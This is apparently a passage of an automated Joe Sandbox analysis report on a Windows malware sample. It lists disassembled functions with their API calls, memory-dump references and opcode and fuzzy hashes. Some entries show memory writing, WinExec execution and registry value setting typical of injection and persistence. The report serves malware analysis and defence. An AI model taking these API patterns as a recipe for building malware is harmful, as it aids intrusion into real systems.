                                                                                        • Instruction Fuzzy Hash: EB414F75F102499FEF02EBA4D895ADEB7FAEF9C710F604831E442A7250DA70AD018F61
                                                                                        Function 027E889C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                        • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        • FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1543721669-0
                                                                                        • Opcode ID: b5167110f52f76b5a60d5c8016cbf0a00c8e209ef702ff3316ef077f487e7aa4
                                                                                        • Instruction ID: 6ceb12b66d6e32a531228b3daa64b948cbd80ceb9b1158075fd7c3cb9e6c4491
                                                                                        • Opcode Fuzzy Hash: b5167110f52f76b5a60d5c8016cbf0a00c8e209ef702ff3316ef077f487e7aa4
                                                                                        • Instruction Fuzzy Hash: 4A1184B8A41304AFEB01FBB9EE1EB1E77FEEB48700F4504207505E7290D674A9448B1A
                                                                                        Function 027E8486 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • WinExec.KERNEL32(?,?), ref: 027E84F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                        • String ID: Kernel32$WinExec
                                                                                        • API String ID: 2292790416-3609268280
                                                                                        • Opcode ID: 3058bbf6a1d8f1db88e484f78e926d47116b78ce1f6ce5f5fe9ba601d7667d96
                                                                                        • Instruction ID: 8899f1951b1a399b110c73b3b922175e00bb590dd549b8b8b5fcd380e15bf44c
                                                                                        • Opcode Fuzzy Hash: 3058bbf6a1d8f1db88e484f78e926d47116b78ce1f6ce5f5fe9ba601d7667d96
                                                                                        • Instruction Fuzzy Hash: 9A018CB5640308BFEB12EFA4DD1AB5A77FEE74CB00F918420B501D3660EA74AD148A36
                                                                                        Function 027E8488 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • WinExec.KERNEL32(?,?), ref: 027E84F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                        • String ID: Kernel32$WinExec
                                                                                        • API String ID: 2292790416-3609268280
                                                                                        • Opcode ID: 6fe8732e84303a77bbbd8c123e55610b9dba9da87d1617b12641af409784141e
                                                                                        • Instruction ID: 4ef17424ced78a5d19637eefeebbee2ecb24f44935dd4a073628b56f4e951671
                                                                                        • Opcode Fuzzy Hash: 6fe8732e84303a77bbbd8c123e55610b9dba9da87d1617b12641af409784141e
                                                                                        • Instruction Fuzzy Hash: 1EF08CB5640308BFEB12EFA4DD1AB5A77FEE74CB00F918420B501D3660DA74A9148A36
                                                                                        Function 027E5C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027E5D74,?,?,027E3900,00000001), ref: 027E5C88
                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027E5D74,?,?,027E3900,00000001), ref: 027E5CB6
                                                                                          • Part of subcall function 027D7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,027E3900,027E5CF6,00000000,027E5D74,?,?,027E3900), ref: 027D7DAA
                                                                                          • Part of subcall function 027D7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,027E3900,027E5D11,00000000,027E5D74,?,?,027E3900,00000001), ref: 027D7FB7
                                                                                        • GetLastError.KERNEL32(00000000,027E5D74,?,?,027E3900,00000001), ref: 027E5D1B
                                                                                          • Part of subcall function 027DA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,027DC3D9,00000000,027DC433), ref: 027DA797
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 503785936-0
                                                                                        • Opcode ID: f41e8f47b84f8ad0b3fddcff15fdb994b0f43d599ce0161824cf00d7813c4fb5
                                                                                        • Instruction ID: eef9838cbcbbffcdc8056df974083225f73c9b6ff26a657494f530574c736559
                                                                                        • Opcode Fuzzy Hash: f41e8f47b84f8ad0b3fddcff15fdb994b0f43d599ce0161824cf00d7813c4fb5
                                                                                        • Instruction Fuzzy Hash: 5931D574E006099FDB02EFA9C8897EDB7F6AB0D704F908465D505AB390D7755A048FB1
                                                                                        Function 027EF506 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,0291FA64), ref: 027EF54C
                                                                                        • RegSetValueExA.ADVAPI32(000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF584
                                                                                        • RegCloseKey.ADVAPI32(000008B4,000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF58F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID:
                                                                                        • API String ID: 779948276-0
                                                                                        • Opcode ID: 4c93381b53a65b0d84769105e3574b8d0ad0b97aac33f8fb4b87282817c3c902
                                                                                        • Instruction ID: 59b7bb6ce2f4f9a339eda1de716c035d30dd90b726f862033d3df35e47f72b8e
                                                                                        • Opcode Fuzzy Hash: 4c93381b53a65b0d84769105e3574b8d0ad0b97aac33f8fb4b87282817c3c902
                                                                                        • Instruction Fuzzy Hash: 53113D71644608AFEB02EF69EC95A697BFDEB08710F400460F505D7A90EB34EA40CF64
                                                                                        Function 027EF508 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,0291FA64), ref: 027EF54C
                                                                                        • RegSetValueExA.ADVAPI32(000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF584
                                                                                        • RegCloseKey.ADVAPI32(000008B4,000008B4,00000000,00000000,00000001,00000000,0000001C,00000000,027EF5B7), ref: 027EF58F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID:
                                                                                        • API String ID: 779948276-0
                                                                                        • Opcode ID: a08099b275ca3488788ca50df73634466cb01f742e068beca8a0a1fa3cb7a3e2
                                                                                        • Instruction ID: 11c13fabadf9313474ce19f45823525b40be138f6929e95040b652034cf822fc
                                                                                        • Opcode Fuzzy Hash: a08099b275ca3488788ca50df73634466cb01f742e068beca8a0a1fa3cb7a3e2
                                                                                        • Instruction Fuzzy Hash: 09113A71644608AFEB02EF69EC95A9A7BFDEB08710F800460F505D7A90EB34EA40CF64
                                                                                        Function 027DE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: bdf24b9b4a84d76d6b99f4a02b357de5794f6a0c09f0e70233ac7d7f969ec5a2
                                                                                        • Instruction ID: 47cfb87e6d0f15b1d6fca3d0d0c53ac1814f44973396d0301c405323fdbefd07
                                                                                        • Opcode Fuzzy Hash: bdf24b9b4a84d76d6b99f4a02b357de5794f6a0c09f0e70233ac7d7f969ec5a2
                                                                                        • Instruction Fuzzy Hash: F4F0CD20708210C7CB277B39CD8867D37BA9F40364764583AA446AF202CB64CC45CBA2
                                                                                        Function 027D4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 027D4D5B
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 027D4D6D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 986138563-0
                                                                                        • Opcode ID: 5dddb5a7acdf1ffc264aed21d51a399118c55e024ce88522a09c9b5f103c8e92
                                                                                        • Instruction ID: 8584caf13daaad371d23b94c4d2d0b1dd1f93098fc8997f599252072b84a6ebd
                                                                                        • Opcode Fuzzy Hash: 5dddb5a7acdf1ffc264aed21d51a399118c55e024ce88522a09c9b5f103c8e92
                                                                                        • Instruction Fuzzy Hash: AFE05BB83062056EFF156F61DD54B37333AAFC3740B548899E804DE164D739E441AD38
                                                                                        Function 027E70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(?), ref: 027E73DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID: H
                                                                                        • API String ID: 3341692771-2852464175
                                                                                        • Opcode ID: 06bdc41f1454ffd45dd39d1003aeac44b9bc69d46aa42d8b5c5d49cc95c93d33
                                                                                        • Instruction ID: 276470291b01e885ce0dbfc3c1ab8920f723c18603085c018145395a4c1f3b82
                                                                                        • Opcode Fuzzy Hash: 06bdc41f1454ffd45dd39d1003aeac44b9bc69d46aa42d8b5c5d49cc95c93d33
                                                                                        • Instruction Fuzzy Hash: 23B1C074A016089FDB19CF99D880A9DFBF6FF8D314F258169E846AB360D731A845CF60
                                                                                        Function 027DE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 027DE781
                                                                                          • Part of subcall function 027DE364: VariantClear.OLEAUT32(?), ref: 027DE373
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCopy
                                                                                        • String ID:
                                                                                        • API String ID: 274517740-0
                                                                                        • Opcode ID: 4995d7d3ff3f84f50d300ab90048ea16d304454d4682f39f2b18a37adc97d154
                                                                                        • Instruction ID: 88e2c7e3ebbd2f6d59a98cc16ab1d700559319c6ab7975ffa18d24c7206009b2
                                                                                        • Opcode Fuzzy Hash: 4995d7d3ff3f84f50d300ab90048ea16d304454d4682f39f2b18a37adc97d154
                                                                                        • Instruction Fuzzy Hash: 6211A52070021187C773AF29C9C9A6637FAAF84760B51943AE54BAF219DB30CC40CA62
                                                                                        Function 027DE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1927566239-0
                                                                                        • Opcode ID: 4106ce54f3494c43c6dc2d4394d9a2f02466c29f8fdaffdffc85f1fcd29b705a
                                                                                        • Instruction ID: 422f6cc87450a4659f4656021fdd91258aeee51cceffdc57944fdbff15c8ad03
                                                                                        • Opcode Fuzzy Hash: 4106ce54f3494c43c6dc2d4394d9a2f02466c29f8fdaffdffc85f1fcd29b705a
                                                                                        • Instruction Fuzzy Hash: B5315471600208AFDB12EFA8D888AAE77F9EB0C314F544565F949DB240D734F950CBA1
                                                                                        Function 027E6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,027E6DB9,?,?,?,00000000), ref: 027E6D99
                                                                                          • Part of subcall function 027D4C60: SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgString
                                                                                        • String ID:
                                                                                        • API String ID: 4225568880-0
                                                                                        • Opcode ID: 481863d72998645319ac5e7b3048b94b466fb704b7a1b46bd4ac6328c852f1c5
                                                                                        • Instruction ID: d47b9f504c21f15a22c7004cb3d1549ae99c68ed1e721b69772ac58b2669f714
                                                                                        • Opcode Fuzzy Hash: 481863d72998645319ac5e7b3048b94b466fb704b7a1b46bd4ac6328c852f1c5
                                                                                        • Instruction Fuzzy Hash: F6E0ED75200208BBEB13EB63DC61D8E7BFDDB8E700BA104B1E90193610DA31AE0088B0
                                                                                        Function 027D5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027D5886
                                                                                          • Part of subcall function 027D5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,027D0000,027FE790), ref: 027D5AE8
                                                                                          • Part of subcall function 027D5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B06
                                                                                          • Part of subcall function 027D5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B24
                                                                                          • Part of subcall function 027D5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D5B42
                                                                                          • Part of subcall function 027D5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D5B8B
                                                                                          • Part of subcall function 027D5ACC: RegQueryValueExA.ADVAPI32(?,027D5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001), ref: 027D5BA9
                                                                                          • Part of subcall function 027D5ACC: RegCloseKey.ADVAPI32(?,027D5BD8,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D5BCB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                        • String ID:
                                                                                        • API String ID: 2796650324-0
                                                                                        • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                        • Instruction ID: 74db4097aefe0c216075f0d6fad94a1de84f50ffb3d658e2807117a1dfdf44d8
                                                                                        • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                        • Instruction Fuzzy Hash: 16E09271A003148FCB10DE9CC9C5B5637E8AF48750F480961EC58CF346D7B1D9108BD0
                                                                                        Function 027D7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 027D7DF4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                        • Instruction ID: 8f1760e1847f266f59a27c5afbc7100f145bf6179ee8ec1720bc08875c16b9c2
                                                                                        • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                        • Instruction Fuzzy Hash: FCD05BB23081507AE224955AAD44EA75BECCBC6771F10073DF568C7180D7208C01C671
                                                                                        Function 027D7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
